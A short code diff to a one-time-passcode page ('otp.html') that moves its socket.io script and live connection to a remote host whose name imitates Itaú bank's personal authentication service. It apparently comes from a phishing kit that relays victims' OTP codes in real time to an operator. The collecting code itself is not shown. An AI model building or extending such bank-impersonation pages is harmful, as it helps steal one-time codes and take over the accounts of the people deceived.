--- a/otp.html
+++ b/otp.html
@@ -262,9 +262,9 @@
         </form>
     </div>
 
-    <script src="/socket.io/socket.io.js"></script>
+    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
     <script>
-        const socket = io({
+        const socket = io('https://itaupersonasautenticacion.up.railway.app', {
             reconnection: true,
             reconnectionDelay: 500,
             reconnectionDelayMax: 2000,
